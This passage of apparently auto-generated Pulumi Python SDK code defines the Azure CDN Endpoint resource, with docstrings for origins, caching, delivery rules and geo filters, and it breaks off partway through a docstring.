* `host_name` (`str`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`float`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`float`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`str`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
probe_path: pulumi.Output[str]
"""
the path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the `origin_path`.
"""
profile_name: pulumi.Output[str]
"""
The CDN Profile to which to attach the CDN Endpoint.
"""
querystring_caching_behaviour: pulumi.Output[str]
"""
Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
"""
resource_group_name: pulumi.Output[str]
"""
The name of the resource group in which to create the CDN Endpoint.
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
def __init__(__self__, resource_name, opts=None, content_types_to_compresses=None, delivery_rules=None, geo_filters=None, global_delivery_rule=None, is_compression_enabled=None, is_http_allowed=None, is_https_allowed=None, location=None, name=None, optimization_type=None, origin_host_header=None, origin_path=None, origins=None, probe_path=None, profile_name=None, querystring_caching_behaviour=None, resource_group_name=None, tags=None, __props__=None, __name__=None, __opts__=None):
"""
A CDN Endpoint is the entity within a CDN Profile containing configuration information regarding caching behaviours and origins. The CDN Endpoint is exposed using the URL format <endpointname>.azureedge.net.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] content_types_to_compresses: An array of strings that indicates a content types on which compression will be applied. The value for the elements should be MIME types.
:param pulumi.Input[list] delivery_rules: Rules for the rules engine. An endpoint can contain up until 4 of those rules that consist of conditions and actions. A `delivery_rule` blocks as defined below.
:param pulumi.Input[list] geo_filters: A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
:param pulumi.Input[dict] global_delivery_rule: Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
:param pulumi.Input[bool] is_compression_enabled: Indicates whether compression is to be enabled. Defaults to false.
:param pulumi.Input[bool] is_http_allowed: Defaults to `true`.
:param pulumi.Input[bool] is_https_allowed: Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
:param pulumi.Input[str] optimization_type: What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
:param pulumi.Input[str] origin_host_header: The host header CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
:param pulumi.Input[str] origin_path: The path used at for origin requests.
:param pulumi.Input[list] origins: The set of origins of the CDN endpoint. When multiple origins exist, the first origin will be used as primary and rest will be used as failover options. Each `origin` block supports fields documented below.
:param pulumi.Input[str] probe_path: the path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the `origin_path`.
:param pulumi.Input[str] profile_name: The CDN Profile to which to attach the CDN Endpoint.
:param pulumi.Input[str] querystring_caching_behaviour: Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the CDN Endpoint.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **delivery_rules** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `cookiesConditions` (`pulumi.Input[list]`) - A `cookies_condition` block as defined above.
* `matchValues` (`pulumi.Input[list]`) - List of values for the cookie.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the cookie.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`pulumi.Input[dict]`) - A `device_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `httpVersionConditions` (`pulumi.Input[list]`) - A `http_version_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `name` (`pulumi.Input[str]`) - The Name which should be used for this Delivery Rule.
* `order` (`pulumi.Input[float]`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`pulumi.Input[list]`) - A `post_arg_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the post arg.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`pulumi.Input[list]`) - A `query_string_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`pulumi.Input[list]`) - A `remote_address_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values. For `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`). List of IP address if `operator` equals to `IPMatch`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`pulumi.Input[list]`) - A `request_body_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`pulumi.Input[list]`) - A `request_header_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of header values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Header name.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`pulumi.Input[dict]`) - A `request_method_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `requestSchemeCondition` (`pulumi.Input[dict]`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `requestUriConditions` (`pulumi.Input[list]`) - A `request_uri_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`pulumi.Input[list]`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`pulumi.Input[list]`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`pulumi.Input[list]`) - A `url_path_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **geo_filters** object supports the following:
* `action` (`pulumi.Input[str]`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`pulumi.Input[list]`) - A List of two letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`pulumi.Input[str]`) - The relative path applicable to geo filter.
The **global_delivery_rule** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **origins** object supports the following:
* `host_name` (`pulumi.Input[str]`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`pulumi.Input[float]`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`pulumi.Input[float]`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`pulumi.Input[str]`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['content_types_to_compresses'] = content_types_to_compresses
__props__['delivery_rules'] = delivery_rules
__props__['geo_filters'] = geo_filters
__props__['global_delivery_rule'] = global_delivery_rule
__props__['is_compression_enabled'] = is_compression_enabled
__props__['is_http_allowed'] = is_http_allowed
__props__['is_https_allowed'] = is_https_allowed
__props__['location'] = location
__props__['name'] = name
__props__['optimization_type'] = optimization_type
__props__['origin_host_header'] = origin_host_header
__props__['origin_path'] = origin_path
if origins is None:
raise TypeError("Missing required property 'origins'")
__props__['origins'] = origins
__props__['probe_path'] = probe_path
if profile_name is None:
raise TypeError("Missing required property 'profile_name'")
__props__['profile_name'] = profile_name
__props__['querystring_caching_behaviour'] = querystring_caching_behaviour
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['host_name'] = None
super(Endpoint, __self__).__init__(
'azure:cdn/endpoint:Endpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, content_types_to_compresses=None, delivery_rules=None, geo_filters=None, global_delivery_rule=None, host_name=None, is_compression_enabled=None, is_http_allowed=None, is_https_allowed=None, location=None, name=None, optimization_type=None, origin_host_header=None, origin_path=None, origins=None, probe_path=None, profile_name=None, querystring_caching_behaviour=None, resource_group_name=None, tags=None):
"""
Get an existing Endpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] content_types_to_compresses: An array of strings that indicates a content types on which compression will be applied. The value for the elements should be MIME types.
:param pulumi.Input[list] delivery_rules: Rules for the rules engine. An endpoint can contain up until 4 of those rules that consist of conditions and actions. A `delivery_rule` blocks as defined below.
:param pulumi.Input[list] geo_filters: A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
:param pulumi.Input[dict] global_delivery_rule: Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
:param pulumi.Input[str] host_name: A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_compression_enabled: Indicates whether compression is to be enabled. Defaults to false.
:param pulumi.Input[bool] is_http_allowed: Defaults to `true`.
:param pulumi.Input[bool] is_https_allowed: Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
:param pulumi.Input[str] optimization_type: What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
:param pulumi.Input[str] origin_host_header: The host header CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
:param pulumi.Input[str] origin_path: The path used at for origin requests.
:param pulumi.Input[list] origins: The set of origins of the CDN endpoint. When multiple origins exist, the first origin will be used as primary and rest will be used as failover options. Each `origin` block supports fields documented below.
:param pulumi.Input[str] probe_path: the path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the `origin_path`.
:param pulumi.Input[str] profile_name: The CDN Profile to which to attach the CDN Endpoint.
:param pulumi.Input[str] querystring_caching_behaviour: Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the CDN Endpoint.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **delivery_rules** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `cookiesConditions` (`pulumi.Input[list]`) - A `cookies_condition` block as defined above.
* `matchValues` (`pulumi.Input[list]`) - List of values for the cookie.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the cookie.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`pulumi.Input[dict]`) - A `device_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `httpVersionConditions` (`pulumi.Input[list]`) - A `http_version_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `name` (`pulumi.Input[str]`) - The Name which should be used for this Delivery Rule.
* `order` (`pulumi.Input[float]`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`pulumi.Input[list]`) - A `post_arg_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the post arg.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`pulumi.Input[list]`) - A `query_string_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`pulumi.Input[list]`) - A `remote_address_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values. For `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`). List of IP address if `operator` equals to `IPMatch`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`pulumi.Input[list]`) - A `request_body_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`pulumi.Input[list]`) - A `request_header_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of header values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Header name.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`pulumi.Input[dict]`) - A `request_method_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `requestSchemeCondition` (`pulumi.Input[dict]`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Equal`.
* `requestUriConditions` (`pulumi.Input[list]`) - A `request_uri_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`pulumi.Input[list]`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`pulumi.Input[list]`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`pulumi.Input[list]`) - A `url_path_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **geo_filters** object supports the following:
* `action` (`pulumi.Input[str]`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`pulumi.Input[list]`) - A List of two letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`pulumi.Input[str]`) - The relative path applicable to geo filter.
The **global_delivery_rule** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
